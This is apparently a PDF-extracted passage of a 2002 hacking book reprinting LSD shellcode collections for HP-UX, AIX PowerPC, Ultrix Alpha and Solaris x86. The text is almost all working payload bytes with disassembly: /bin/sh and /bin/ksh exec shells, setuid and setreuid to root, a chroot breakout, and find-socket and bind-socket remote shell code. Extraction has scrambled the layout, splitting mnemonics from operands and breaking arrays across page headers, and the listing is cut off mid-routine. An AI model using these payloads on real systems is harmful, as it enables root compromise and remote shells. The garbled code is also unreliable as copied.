"\xe4\x20\xe0\x08"
"\x0a\xf7\x02\x97"
"\xe8\x40\xc0\x02"
"\x61\x02\x23\x45"
"\xb4\x1a\x40\x04"
"\xb4\x19\x40\x02"
"\x0b\x18\x02\x98"
"\xe8\x5f\x1f\xad"
"\xb4\x16\x72\x44"
"\x08\x1c\x06\x0d"
"\xb5\x8c\x40\x10"
"\xb4\x18\x40\x20"
"\x08\x0d\x06\x1a"
"\x0d\x80\x12\x8a"
"\xb5\x99\x40\x02"
"\xe8\x5f\x1f\x6d"
"\xb4\x16\x72\x28"
"\x08\x0d\x06\x1a"
"\xb4\x19\x40\x02"
"\xe8\x5f\x1f\x4d"
"\xb4\x16\x72\x32"
"\x08\x0d\x06\x1a"
"\x0b\x39\x02\x99"
"\x0b\x18\x02\x98"
"\xe8\x5f\x1f\x25"
"\xb4\x16\x72\x26"
"\xb4\x0e\x40\x04"
"\x08\x1c\x06\x0c"
"\x08\x0c\x06\x1a"
"\x08\x0e\x06\x19"
"\xe8\x5f\x1e\xf5"
"\xb4\x16\x70\xb4"
"\x88\x0e\x3f\xd5"
"\xb5\xce\x07\xff"
;

/*
/*
/*
/*
/*
/*
/*

37*4 bytes
addi,< 0x2,%r0,%r23
blr,n
%r23,%r12
ldil
L%0xc0000004,%r1
ble
R%0xc0000004(%sr7,%r1)
xor
%r23,%r23,%r23
bv,n
0(%rp)

/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*

addi,<
addi,<
xor
bl
addi,>
add
addi,<
addi,<
add
stw
addi,<
bl
addi,>
add
addi,<
bl
addi,>
add
xor
xor
bl
addi,>
addi,<
add
add
add
bl
addi,>
combf,=
addi

char jump[]=
"\xe0\x40\x00\x00"
"\x37\xdc\x00\x00"
;

/* be
/* copy

#define FINDSCKPORTOFS
#define BINDSCKPORTOFS

58
26

*/
*/
*/
*/
*/
*/
*/

0x2,%r0,%r26
*/
0x1,%r0,%r25
*/
%r24,%r24,%r24
*/
<bindsckcode+4>,%rp
*/
0x122,%r0,%r22
*/
%ret0,%r0,%r13
*/
0x8,%r12,%r12
*/
0x10,%r0,%r24
*/
%r13,%r0,%r26
*/
%r0,0x5(%r12)
*/
0x1,%r12,%r25
*/
<bindsckcode+4>,%rp
*/
0x114,%r0,%r22
*/
%r13,%r0,%r26
*/
0x1,%r0,%r25
*/
<bindsckcode+4>,%rp
*/
0x119,%r0,%r22
*/
%r13,%r0,%r26
*/
%r25,%r25,%r25
*/
%r24,%r24,%r24
*/
<bindsckcode+4>,%rp
*/
0x113,%r0,%r22
*/
0x2,%r0,%r14
*/
%ret0,%r0,%r12
*/
%r12,%r0,%r26
*/
%r14,%r0,%r25
*/
<bindsckcode+4>,%rp
*/
0x5a,%r0,%r22
*/
%r14,%r0,<bindsckcode+124> */
-0x1,%r14,%r14
*/

0x0(%sr0,%rp)
%sp,%ret0

*/
*/

(C) Copyright 2002 Flavio Bernadotti HackersBook@crackinguniversity2000.it

Hackers Programming Book

#endif

AIX/POWER/PowerPC codes, file: powerpc-aix


/*## copyright LAST STAGE OF DELIRIUM feb 2001 poland
/*## asmcodes for aix 4.1 4.2 4.3 power/powerpc
/*
syscall
----------execve
execve
seteuid
mkdir
chroot
chdir
getpeername
socket
bind
listen
accept
close
kfcntl
*/

%r2
---x003
x003
x068
x07f
x06f
x06d
x041
x057
x056
x055
x053
x05e
x0d6
v4.1

%r2
---x002
x002
x071
x08e
x078
x076
x046
x05b
x05a
x059
x058
x062
x0e7
v4.2

%r2
---x004
x004
x082
x0a0
x089
x087
x053
x069
x068
x067
x065
x071
x0fc
v4.3

*://lsd-pl.net/ #*/
#*/

%r3,%r4,%r5
----------------------------------------------------->path="/bin/sh",->[->a0=path,0],0
->path="/bin/sh",->[->a0=path,->a1="-c",->a2=cmd,0],0
euid=0
->path="t..",mode= (each value is valid)
->path={"t..","."}
->path=".."
sfd,->sadr=[],->[len=0x2c]
AF_INET=2,SOCK_STREAM=1,prot=0
sfd,->sadr=[0x2c,0x02,hi,lo,0,0,0,0],len=0x10
sfd,backlog=5
sfd,0,0
fd={0,1,2}
sfd,F_DUPFD=0,fd={0,1,2}

#if defined(POWERPC) && defined(AIX)


char _shellcode[]=
"\x7c\xa5\x2a\x79"
"\x40\x82\xff\xfd"
"\x7f\xe8\x02\xa6"
"\x3b\xff\x01\x20"
"\x38\x7f\xff\x08"
"\x38\x9f\xff\x10"
"\x90\x7f\xff\x10"
"\x90\xbf\xff\x14"
"\x88\x5f\xff\x0f"
"\x98\xbf\xff\x0f"
"\x4c\xc6\x33\x42"
"\x44\xff\xff\x02"
"/bin/sh"
#ifdef V41
"\x03"
#endif
#ifdef V42
"\x02"
#endif
#ifdef V43
"\x04"
#endif
;

/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*

12*4+8 bytes
xor.
r5,r5,r5
bnel
<shellcode>
mflr
r31
cal
r31,0x120(r31)
cal
r3,-248(r31)
cal
r4,-240(r31)
st
r3,-240(r31)
st
r5,-236(r31)
lbz
r2,-241(r31)
stb
r5,-241(r31)
crorc
cr6,cr6,cr6
svca

char _setreuidshellcode[]=
"\x7e\x94\xa2\x79"
"\x40\x82\xff\xfd"
"\x7e\xa8\x02\xa6"
"\x3a\xb5\x01\x40"
"\x88\x55\xfe\xe0"
"\x7e\x83\xa3\x78"
"\x3a\xd5\xfe\xe4"
"\x7e\xc8\x03\xa6"
"\x4c\xc6\x33\x42"
"\x44\xff\xff\x02"
#ifdef V41
"\x68\x03\xff\xff"
#endif
#ifdef V42
"\x71\x02\xff\xff"
#endif
#ifdef V43
"\x82\x04\xff\xff"
#endif
"\x38\x75\xff\x04"

/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*

19*4+7 bytes
xor.
r20,r20,r20
bnel
(setreuidcode)
mflr
r21
cal
r21,0x140(r21)
lbz
r2,-288(r21)
mr
r3,r20
cal
r22,-284(r21)
mtlr
r22
crorc
cr6,cr6,cr6
svca

/* cal

r3,-252(r21)

*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/

*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/

*/

(C) Copyright 2002 Flavio Bernadotti HackersBook@crackinguniversity2000.it

Hackers Programming Book


"\x38\x95\xff\x0c"
"\x7e\x85\xa3\x78"
"\x90\x75\xff\x0c"
"\x92\x95\xff\x10"
"\x88\x55\xfe\xe1"
"\x9a\x95\xff\x0b"
"\x4b\xff\xff\xd8"
"/bin/sh"

/*
/*
/*
/*
/*
/*
/*

cal
mr
st
st
lbz
stb
bl

r4,-244(r21)
r5,r20
r3,-244(r21)
r20,-240(r21)
r2,-287(r21)
r20,-245(r21)
(setreuidcode+32)

*/
*/
*/
*/
*/
*/
*/

char syscallcode[]=
"\x7e\x94\xa2\x79"
"\x40\x82\xff\xfd"
"\x7e\xa8\x02\xa6"
"\x3a\xc0\x01\xff"
"\x3a\xf6\xfe\x2d"
"\x7e\xb5\xba\x14"
"\x7e\xa9\x03\xa6"
"\x4e\x80\x04\x20"
#ifdef V41
"\x03\x68\x41\x5e"
"\x6d\x7f\x6f\xd6"
"\x57\x56\x55\x53"
#endif
#ifdef V42
"\x02\x71\x46\x62"
"\x76\x8e\x78\xe7"
"\x5b\x5a\x59\x58"
#endif
#ifdef V43
"\x04\x82\x53\x71"
"\x87\xa0\x89\xfc"
"\x69\x68\x67\x65"
#endif
"\x4c\xc6\x33\x42"
"\x44\xff\xff\x02"
"\x3a\xb5\xff\xf8"
;

/*
/*
/*
/*
/*
/*
/*
/*
/*

14*4 bytes
xor.
r20,r20,r20
bnel
<syscallcode>
mflr
r21
lil
r22,0x1ff
cal
r23,-467(r22)
cax
r21,r21,r23
mtctr
r21
bctr

char shellcode[]=
"\x7c\xa5\x2a\x79"
"\x40\x82\xff\xfd"
"\x7f\xe8\x02\xa6"
"\x3b\xff\x01\x20"
"\x38\x7f\xff\x08"
"\x38\x9f\xff\x10"
"\x90\x7f\xff\x10"
"\x90\xbf\xff\x14"
"\x88\x55\xff\xf4"
"\x98\xbf\xff\x0f"
"\x7e\xa9\x03\xa6"
"\x4e\x80\x04\x20"
"/bin/sh"
;

/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*

12*4+7 bytes
xor.
r5,r5,r5
bnel
<shellcode>
mflr
r31
cal
r31,0x120(r31)
cal
r3,-248(r31)
cal
r4,-240(r31)
st
r3,-240(r31)
st
r5,-236(r31)
lbz
r2,-12(r21)
stb
r5,-241(r31)
mtctr
r21
bctr

*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/

char cmdshellcode[]=
"\x7c\xa5\x2a\x79"
"\x40\x82\xff\xfd"
"\x7f\xe8\x02\xa6"
"\x3b\xff\x01\x2c"
"\x38\x7f\xff\x10"
"\x38\x9f\xfe\xc8"
"\x38\xdf\xff\x18"
"\x38\xff\xff\x1c"
"\x90\x7f\xfe\xc8"
"\x90\xdf\xfe\xcc"
"\x90\xff\xfe\xd0"
"\x90\xbf\xfe\xd4"
"\x98\xbf\xff\x17"
"\x98\xbf\xff\x1a"
"\x88\x55\xff\xf4"
"\x7e\xa9\x03\xa6"
"\x4e\x80\x04\x20"
"/bin/sh -c "
/* command */
;

/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*

17*4+12+cmdlen bytes
xor.
r5,r5,r5
bnel
<cmdshellcode>
mflr
r31
cal
r31,0x12c(r31)
cal
r3,-240(r31)
cal
r4,-312(r31)
cal
r6,-232(r31)
cal
r7,-228(r31)
st
r3,-312(r31)
st
r6,-308(r31)
st
r7,-304(r31)
st
r5,-300(r31)
stb
r5,-233(r31)
stb
r5,-230(r31)
lbz
r2,-12(r21)
mtctr
r21
bctr

*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/

/* crorc
/* svca
/* cal

cr6,cr6,cr6
0x0
r21,-8(r21)

*/
*/
*/
*/
*/
*/
*/
*/
*/

*/
*/
*/

(C) Copyright 2002 Flavio Bernadotti HackersBook@crackinguniversity2000.it

Hackers Programming Book


char setreuidcode[]=
"\x88\x55\xff\xf5"
"\x7e\x83\xa3\x78"
"\x7e\xa9\x03\xa6"
"\x4e\x80\x04\x21"
;

/*
/*
/*
/*
/*

4*4 bytes
lbz
r2,-11(r21)
mr
r3,r20
mtctr
r21
bctrl

*/
*/
*/
*/
*/

char chrootcode[]=
"\x2c\x74\x2e\x2e"
"\x41\x82\xff\xfd"
"\x7f\x08\x02\xa6"
"\x92\x98\xff\xfc"
"\x38\x78\xff\xf9"
"\x88\x55\xff\xf9"
"\x7e\xa9\x03\xa6"
"\x4e\x80\x04\x21"
"\x38\x78\xff\xf9"
"\x88\x55\xff\xfa"
"\x7e\xa9\x03\xa6"
"\x4e\x80\x04\x21"
"\x3b\x20\x01\x01"
"\x38\x78\xff\xfa"
"\x88\x55\xff\xf8"
"\x7e\xa9\x03\xa6"
"\x4e\x80\x04\x21"
"\x37\x39\xff\xff"
"\x40\x82\xff\xec"
"\x38\x78\xff\xfb"
"\x88\x55\xff\xfa"
"\x7e\xa9\x03\xa6"
"\x4e\x80\x04\x21"
;

/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*

23*4 bytes
cmpi
cr0,r20,0x2e2e
beql
<chrootcode>
mflr
r24
st
r20,-4(r24)
cal
r3,-7(r24)
lbz
r2,-7(r21)
mtctr
r21
bctrl
cal
r3,-7(r24)
lbz
r2,-6(r21)
mtctr
r21
bctrl
lil
r25,0x101
cal
r3,-6(r24)
lbz
r2,-8(r21)
mtctr
r21
bctrl
ai.
r25,r25,-1
bne
<chrootcode+52>
cal
r3,-5(r24)
lbz
r2,-6(r21)
mtctr
r21
bctrl

*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/

char findsckcode[]=
"\x2c\x74\x12\x34"
"\x41\x82\xff\xfd"
"\x7f\x08\x02\xa6"
"\x3b\x36\xfe\x2d"
"\x3b\x40\x01\x01"
"\x7f\x78\xca\x14"
"\x7f\x69\x03\xa6"
"\x4e\x80\x04\x20"
"\xa3\x78\xff\xfe"
"\xa3\x98\xff\xfa"
"\x7c\x1b\xe0\x40"
"\x3b\x36\xfe\x59"
"\x41\x82\xff\xe4"
"\x7f\x43\xd3\x78"
"\x38\x98\xff\xfc"
"\x38\xb8\xff\xf4"
"\x93\x38\xff\xf4"
"\x88\x55\xff\xf6"
"\x7e\xa9\x03\xa6"
"\x4e\x80\x04\x21"
"\x37\x5a\xff\xff"
"\x2d\x03\xff\xff"
"\x40\x8a\xff\xc8"
"\x40\x82\xff\xd8"
"\x3b\x36\xfe\x03"
"\x3b\x76\xfe\x02"
"\x7f\x23\xcb\x78"
"\x88\x55\xff\xf7"
"\x7e\xa9\x03\xa6"
"\x4e\x80\x04\x21"
"\x7c\x7a\xda\x14"
"\x7e\x84\xa3\x78"
"\x7f\x25\xcb\x78"
"\x88\x55\xff\xfb"
"\x7e\xa9\x03\xa6"
"\x4e\x80\x04\x21"
"\x37\x39\xff\xff"
"\x40\x80\xff\xd4"
;

/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*

38*4 bytes
cmpi
cr0,r20,0x1234
beql
<findsckcode>
mflr
r24
cal
r25,-467(r22)
lil
r26,0x16
cax
r27,r24,r25
mtctr
r27
bctr
lhz
r27,-2(r24)
lhz
r28,-6(r24)
cmpl
cr0,r27,r28
cal
r25,-423(r22)
beq
<findsckcode+20>
mr
r3,r26
cal
r4,-4(r24)
cal
r5,-12(r24)
st
r25,-12(r24)
lbz
r2,-10(r21)
mtctr
r21
bctrl
ai.
r26,r26,-1
cmpi
cr2,r3,-1
bne
cr2,<findsckcode+32>
bne
<findsckcode+48>
cal
r25,-509(r22)
cal
r27,-510(r22)
mr
r3,r25
lbz
r2,-9(r21)
mtctr
r21
bctrl
cax
r3,r26,r27
mr
r4,r20
mr
r5,r25
lbz
r2,-5(r21)
mtctr
r21
bctrl
ai.
r25,r25,-1
bge
<findsckcode+100>

*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/

char bindsckcode[]=
"\x2c\x74\x12\x34"
"\x41\x82\xff\xfd"

/* 42*4 bytes
/* cmpi
cr0,r20,0x1234
/* beql
<bindsckcode>

*/
*/
*/

(C) Copyright 2002 Flavio Bernadotti HackersBook@crackinguniversity2000.it

Hackers Programming Book


"\x7f\x08\x02\xa6"
"\x92\x98\xff\xfc"
"\x38\x76\xfe\x03"
"\x38\x96\xfe\x02"
"\x98\x78\xff\xf9"
"\x7e\x85\xa3\x78"
"\x88\x55\xff\xfc"
"\x7e\xa9\x03\xa6"
"\x4e\x80\x04\x21"
"\x7c\x79\x1b\x78"
"\x38\x98\xff\xf8"
"\x38\xb6\xfe\x11"
"\x88\x55\xff\xfd"
"\x7e\xa9\x03\xa6"
"\x4e\x80\x04\x21"
"\x7f\x23\xcb\x78"
"\x38\x96\xfe\x06"
"\x88\x55\xff\xfe"
"\x7e\xa9\x03\xa6"
"\x4e\x80\x04\x21"
"\x7f\x23\xcb\x78"
"\x7e\x84\xa3\x78"
"\x7e\x85\xa3\x78"
"\x88\x55\xff\xff"
"\x7e\xa9\x03\xa6"
"\x4e\x80\x04\x21"
"\x7c\x79\x1b\x78"
"\x3b\x56\xfe\x03"
"\x7f\x43\xd3\x78"
"\x88\x55\xff\xf7"
"\x7e\xa9\x03\xa6"
"\x4e\x80\x04\x21"
"\x7f\x23\xcb\x78"
"\x7e\x84\xa3\x78"
"\x7f\x45\xd3\x78"
"\x88\x55\xff\xfb"
"\x7e\xa9\x03\xa6"
"\x4e\x80\x04\x21"
"\x37\x5a\xff\xff"
"\x40\x80\xff\xd4"

/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*

mflr
st
cal
cal
stb
mr
lbz
mtctr
bctrl
mr
cal
cal
lbz
mtctr
bctrl
mr
cal
lbz
mtctr
bctrl
mr
mr
mr
lbz
mtctr
bctrl
mr
cal
mr
lbz
mtctr
bctrl
mr
mr
mr
lbz
mtctr
bctrl
ai.
bge

r24
r20,-4(r24)
r3,-509(r22)
r4,-510(r22)
r3,-7(r24)
r5,r20
r2,-4(r21)
r21
r25,r3
r4,-8(r24)
r5,-495(r22)
r2,-3(r21)
r21
r3,r25
r4,-506(r22)
r2,-2(r21)
r21
r3,r25
r4,r20
r5,r20
r2,-1(r21)
r21
r25,r3
r26,-509(r22)
r3,r26
r2,-9(r21)
r21
r3,r25
r4,r20
r5,r26
r2,-5(r21)
r21
r26,r26,-1
<bindsckcode+120>

*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/

;
#define FINDSCKPORTOFS
#define BINDSCKPORTOFS

2
2

#endif

Ultrix/ALPHA codes, file: alpha-ultrix


/*## copyright LAST STAGE OF DELIRIUM feb 2001 poland
/*## asmcodes for ultrix 5.0 alpha
/*
syscall
----------execv
execv
setreuid
*/

%v0
---x00b
x00b
x07e

*://lsd-pl.net/ #*/
#*/

%a0,%a1,%a2,%a3
--------------------------------------------------------------->path="/bin/sh",->[->a0=path,0]
->path="/bin/sh",->[->a0=path,->a1="-c",->a2=cmd,0]
ruid,euid=0

#if defined(ALPHA) && defined(ULTRIX)


char shellcode[]=
"\xfb\x6b\x7f\x26"
"\x01\x80\x73\x22"
"\x40\x01\x7e\xb2"
"\x40\x01\x9e\x22"
"\x10\x40\x54\x6b"
"\x80\x82\x5a\x23"
"\x12\x04\xff\x47"
"\xbb\x7d\xfa\x3b"
"\xb4\x7d\x1a\x22"
"\xc4\x7d\x1a\xb6"
"\xc4\x7d\x3a\x22"
"\xcc\x7d\xfa\xb7"
"\x13\x74\xf0\x47"

/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*

18*4+7 bytes
ldah
a3,27643(zero)
lda
a3,-32767(a3)
stl
a3,320(sp)
lda
a4,320(sp)
jsr
ra,(a4),0x10
lda
ra,-32128(ra)
bis
zero,zero, a2
stb
zero,32187(ra)
lda
a0,32180(ra)
stq
a0,32196(ra)
lda
a1,32196(ra)
stq
zero,32204(ra)
bis
zero,0x83,a3

*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/

(C) Copyright 2002 Flavio Bernadotti HackersBook@crackinguniversity2000.it

Hackers Programming Book


"\x80\x20\x7e\xb2"
"\x80\x20\x9e\x22"
"\xbb\x02\xbf\x22"
"\x50\xfd\x15\x20"
"\x10\x40\x54\x6b"
"/bin/sh"

/*
/*
/*
/*
/*

stl
lda
lda
lda
jsr

a3,8320(sp)
a4,8320(sp)
a5,699(zero)
v0,-640(a5)
ra,(a4),0x10

*/
*/
*/
*/
*/

char cmdshellcode[]=
"\xfb\x6b\x7f\x26"
"\x01\x80\x73\x22"
"\x40\x01\x7e\xb2"
"\x40\x01\x9e\x22"
"\x10\x40\x54\x6b"
"\x80\x82\x5a\x23"
"\xcb\x7d\xfa\x3b"
"\xce\x7d\xfa\x3b"
"\xc4\x7d\x1a\x22"
"\x5c\x7d\x1a\xb6"
"\xcc\x7d\x7a\x22"
"\x64\x7d\x7a\xb6"
"\xd0\x7d\x7a\x22"
"\x6c\x7d\x7a\xb6"
"\x74\x7d\xfa\xb7"
"\x5c\x7d\x3a\x22"
"\x13\x74\xf0\x47"
"\x80\x20\x7e\xb2"
"\x80\x20\x9e\x22"
"\xbb\x02\xbf\x22"
"\x50\xfd\x15\x20"
"\x10\x40\x54\x6b"
"/bin/sh -c "
;

/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*

22*4+7 bytes
ldah
a3,27643(zero)
lda
a3,-32767(a3)
stl
a3,320(sp)
lda
a4,320(sp)
jsr
ra,(a4),0x10
lda
ra,-32128(ra)
stb
zero,32203(ra)
stb
zero,32206(ra)
lda
a0,32196(ra)
stq
a0,32092(ra)
lda
a3,32204(ra)
stq
a3,32100(ra)
lda
a3,32208(ra)
stq
a3,32108(ra)
stq
zero,32116(ra)
lda
a1,32092(ra)
bis
zero,0x83,a3
stl
a3,8320(sp)
lda
a4,8320(sp)
lda
a5,699(zero)
lda
v0,-688(a5)
jsr
ra,(a4),0x10

*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/

char setreuidcode[]=
"\xff\xff\x1f\x22"
"\x11\x04\xff\x47"
"\xbb\x02\xbf\x22"
"\xc3\xfd\x15\x20"
"\x13\x74\xf0\x47"
"\x80\x02\x7e\xb2"
"\x80\x02\x9e\x22"
"\xfb\x6b\x7f\x26"
"\x01\x80\x73\x22"
"\x84\x02\x7e\xb2"
"\x10\x40\x54\x6b"
;

/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*

11*4 bytes
lda
a0,-1(zero)
bis
zero,zero,a1
lda
a5,699(zero)
lda
v0,-573(a5)
bis
zero,0x83,a3
stl
a3,640(sp)
lda
a4,640(sp)
ldah
a3,27643(zero)
lda
a3,-32767(a3)
stl
a3,644(sp)
jsr
ra,(a4),0x10

*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/

char jump[]=
"\00\x40\xde\x47"
"\01\x80\xfa\x6b"
;

/* bis
/* ret

sp,sp,v0
zero,(ra),1

*/
*/

#endif

Solaris/x86 codes, file: x86-solaris


/*## copyright LAST STAGE OF DELIRIUM feb 2001 poland
/*## asmcodes for solaris 2.6 2.7 2.8 x86
/*
syscall
----------exec
exec
setuid
mkdir
chroot
chdir
ioctl
so_socket
bind
listen
accept
fcntl

%eax
---x00b
x00b
x017
x050
x03d
x00c
x036
x0e6
x0e8
x0e9
x0ea
x03e

*://lsd-pl.net/ #*/
#*/

stack
--------------------------------------------------------------ret,->path="/bin/ksh",->[->a0=path,0]
ret,->path="/bin/ksh",->[->a0=path,->a1="-c",->a2=cmd,0]
ret,uid=0
ret,->path="b..",mode= (each value is valid)
ret,->path={"b..","."}
ret,->path=".."
ret,sfd,TI_GETPEERNAME=0x5491,->[mlen=0x91,len=0x91,->sadr=[]]
ret,AF_INET=2,SOCK_STREAM=2,prot=0,devpath=0,SOV_DEFAULT=1
ret,sfd,->sadr=[0xff,2,hi,lo,0,0,0,0],len=0x10,SOV_SOCKSTREAM=2
ret,sfd,backlog=5,vers= (not required in this syscall)
ret,sfd,0,0,vers= (not required in this syscall)
ret,sfd,F_DUP2FD=0x09,fd={0,1,2}

(C) Copyright 2002 Flavio Bernadotti HackersBook@crackinguniversity2000.it

Hackers Programming Book


*/
#if defined(X86) && defined(SOLARIS)
char _shellcode[]=
"\xeb\x1a"
"\x33\xd2"
"\x58"
"\x8d\x78\x14"
"\x57"
"\x50"
"\xab"
"\x92"
"\xab"
"\x88\x42\x08"
"\x83\xef\x3b"
"\xb0\x9a"
"\xab"
"\x47"
"\xb0\x07"
"\xab"
"\xb0\x0b"
"\xe8\xe1\xff\xff\xff"
"/bin/ksh"
;

/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*

33+8 bytes
jmp
<shellcode+28>
xorl
%edx,%edx
popl
%eax
leal
0x14(%eax),%edi
pushl
%edi
pushl
%eax
stosl
%eax,%es:(%edi)
xchgl
%eax,%edx
stosl
%eax,%es:(%edi)
movb
%al,0x8(%edx)
subl
$0x3b,%edi
movb
$0x9a,%al
stosl
%eax,%es:(%edi)
incl
%edi
movb
$0x07,%al
stosl
%eax,%es:(%edi)
movb
$0x0b,%al
call
<shellcode+2>

*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/

char syscallcode[]=
"\x33\xc0"
"\xeb\x09"
"\x5f"
"\x57"
"\x47"
"\xab"
"\x47"
"\xaa"
"\x5e"
"\xeb\x0d"
"\xe8\xf2\xff\xff\xff"
"\x9a\xff\xff\xff\xff"
"\x07\xff"
"\xc3"
;

/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*

26 bytes
xorl
%eax,%eax
jmp
<syscallcode+13>
popl
%edi
pushl
%edi
incl
%edi
stosl
%eax,%es:(%edi)
incl
%edi
stosb
%al,%es:(%edi)
popl
%esi
jmp
<syscallcode+26>
call
<syscallcode+4>

*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/

/* ret

*/

char shellcode[]=
"\xeb\x12"
"\x33\xd2"
"\x58"
"\x8d\x78\x14"
"\x57"
"\x50"
"\xab"
"\x92"
"\xab"
"\x88\x42\x08"
"\xb0\x0b"
"\xff\xd6"
"\xe8\xe9\xff\xff\xff"
"/bin/ksh"
;

/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*

25+8 bytes
jmp
<shellcode+20>
xorl
%edx,%edx
popl
%eax
leal
0x14(%eax),edi
pushl
%edi
pushl
%eax
stosl
%eax,%es:(%edi)
xchgl
%eax,%edx
stosl
%eax,%es:(%edi)
movb
%al,0x8(%edx)
movb
$0x0b,%al
call
*%esi
call
<shellcode+2>

*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/

char cmdshellcode[]=
"\xeb\x1d"
"\x33\xd2"
"\x58"
"\x8d\x78\xac"
"\x57"
"\x50"
"\x88\x50\x08"
"\x88\x50\x0b"
"\xab"
"\x8d\x40\x09"
"\xab"
"\x8d\x40\x03"
"\xab"
"\x92"
"\xab"
"\xb0\x0b"

/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*

36+12+cmdlen bytes
jmp
<cmdshellcode+31>
xorl
%edx,%edx
popl
%eax
leal
-0x44(%eax),edi
pushl
%edi
pushl
%eax
movb
%dl,0x8(%eax)
movb
%dl,0xb(%eax)
stosl
%eax,%es:(%edi)
leal
0x09(%eax),%eax
stosl
%eax,%es:(%edi)
leal
0x03(%eax),%eax
stosl
%eax,%es:(%edi)
xchgl
%eax,%edx
stosl
%eax,%es:(%edi)
movb
$0x0b,%al

*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/

(C) Copyright 2002 Flavio Bernadotti HackersBook@crackinguniversity2000.it

Hackers Programming Book


"\xff\xd6"
/* call
"\xe8\xde\xff\xff\xff" /* call
"/bin/ksh -c "
/* command */

*%esi
<cmdshellcode+2>

*/
*/

%eax,%eax
%eax
$0x17,%al
*%esi

*/
*/
*/
*/
*/

;
char setuidcode[]=
"\x33\xc0"
"\x50"
"\xb0\x17"
"\xff\xd6"
;

/*
/*
/*
/*
/*

7 bytes
xorl
pushl
movb
call

char chrootcode[]=
"\x68""b..."
"\x89\xe7"
"\x33\xc0"
"\x88\x47\x03"
"\x57"
"\xb0\x50"
"\xff\xd6"
"\x57"
"\xb0\x3d"
"\xff\xd6"
"\x47"
"\x33\xc9"
"\xb1\xff"
"\x57"
"\xb0\x0c"
"\xff\xd6"
"\xe2\xfa"
"\x47"
"\x57"
"\xb0\x3d"
"\xff\xd6"
;

/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*

40 bytes
pushl
$0x2e2e2e62
movl
%esp,%edi
xorl
%eax,%eax
movb
%al,0x3(%edi)
pushl
%edi
movb
$0x50,%al
call
*%esi
pushl
%edi
movb
$0x3d,%al
call
*%esi
incl
%edi
xorl
%ecx,%ecx
movb
$0xff,%cl
pushl
%edi
movb
$0x0c,%al
call
*%esi
loop
<chrootcode+28>
incl
%edi
pushl
%edi
movb
$0x3d,%al
call
*%esi

*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/

char findsckcode[]=
"\x56"
"\x5f"
"\x83\xef\x7c"
"\x57"
"\x8d\x4f\x10"
"\xb0\x91"
"\xab"
"\xab"
"\x91"
"\xab"
"\x95"
"\xb5\x54"
"\x51"
"\x66\xb9\x01\x01"
"\x51"
"\x33\xc0"
"\xb0\x36"
"\xff\xd6"
"\x59"
"\x33\xdb"
"\x3b\xc3"
"\x75\x0a"
"\x66\xbb\x12\x34"
"\x66\x39\x5d\x02"
"\x74\x02"
"\xe2\xe6"
"\x6a\x09"
"\x51"
"\x91"
"\xb1\x03"
"\x49"
"\x89\x4c\x24\x08"
"\x41"
"\xb0\x3e"
"\xff\xd6"
"\xe2\xf4"
;

/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*

67 bytes
pushl
%esi
popl
%edi
subl
$0x7c,%edi
pushl
%edi
leal
0x10(%edi),%ecx
movb
$0x91,%al
stosl
%eax,%es:(%edi)
stosl
%eax,%es:(%edi)
xchgl
